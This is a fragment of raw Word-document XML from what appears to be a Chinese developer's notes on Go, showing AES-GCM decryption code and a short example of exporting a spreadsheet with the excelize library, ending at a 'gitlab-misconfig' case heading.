          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecodeString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(hex_cipher_key)</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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>cipher_iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecodeString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(hex_iv)</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t>block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>aes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(cipher_key)</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t>aesGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">_ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(block)</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t>plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>err := aesGCM.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipher_iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cipherBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Fatal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(err)</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE846A0" w14:textId="77777777" w:rsidR="00F83D04" w:rsidRPr="002D3009" w:rsidRDefault="00F83D04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D9C565" w14:textId="77777777" w:rsidR="00F83D04" w:rsidRDefault="00F83D04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B64C90C" w14:textId="77777777" w:rsidR="00236217" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3391ED32" w14:textId="541B238C" w:rsidR="00E51F77" w:rsidRDefault="0010151A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="348" w:name="_Toc159779804"/>
      <w:r w:rsidRPr="00631F9B">
        <w:t>github.com/qax-os/excelize.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00EE5BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
    </w:p>
    <w:p w14:paraId="7FDCA9C3" w14:textId="0E5E712F" w:rsidR="00E51F77" w:rsidRDefault="00E51F77" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D066326" w14:textId="2E9B4E79" w:rsidR="00631F9B" w:rsidRDefault="00C376BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00631F9B" w:rsidRPr="00631F9B">
        <w:t>https://github.com/qax-os/excelize.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983A47F" w14:textId="37EA9B63" w:rsidR="00B60367" w:rsidRDefault="00B60367" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidR="00EB6450" w:rsidRPr="00AA7449">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/rainbow-tan/p/15731866.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A79C899" w14:textId="66D92CC1" w:rsidR="00EB6450" w:rsidRPr="00EB6450" w:rsidRDefault="00E70B13" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidR="00EB6450" w:rsidRPr="00EB6450">
        <w:t>https://learnku.com/articles/23656</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F964A" w14:textId="4DC6E54A" w:rsidR="00EE5BC9" w:rsidRDefault="00CE019F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00363C87" w:rsidRPr="00363C87">
        <w:t>https://pkg.go.dev/github.com/xuri/excelize/v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5D743" w14:textId="73501821" w:rsidR="00CE019F" w:rsidRDefault="00CE019F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BA8E51" w14:textId="6AC74F6B" w:rsidR="00CE019F" w:rsidRDefault="00E6636D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>最简单直接的用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC9175" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">f := excelize.NewFile()// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置单元格的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4FD23" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里设置表头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FF412" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f.SetCellValue("Sheet1", "A1", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63630D89" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f.SetCellValue("Sheet1", "B1", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B270B" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E5CEE0" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>line := 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E4736" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773EA24E" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fruits := getFruits()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E57350" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环写入数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558589F8" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for _, v := range fruits {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0ADAFD" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   line++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E800B54" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   f.SetCellValue("Sheet1", fmt.Sprintf("A%d", line), v.ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713F7340" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   f.SetCellValue("Sheet1", fmt.Sprintf("B%d", line), v.Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A354102" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BACC9" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F08AA9" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710467F5" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if err := f.SaveAs("fruits.xlsx"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511517CA" w14:textId="77777777" w:rsidR="0050729E" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5944B4" w14:textId="313E8EE7" w:rsidR="00EE5BC9" w:rsidRDefault="0050729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1250C" w14:textId="2CE71999" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CDCD10" w14:textId="2F13F622" w:rsidR="00EE5BC9" w:rsidRDefault="00407171" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>itlab-misconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D638E16" w14:textId="5F4EB024" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7397D341" w14:textId="0C19FD04" w:rsidR="00F95BE2" w:rsidRDefault="009962F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我此处的代码实现的效果大概如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C43DD" w14:textId="4D576A00" w:rsidR="009962F3" w:rsidRDefault="009962F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
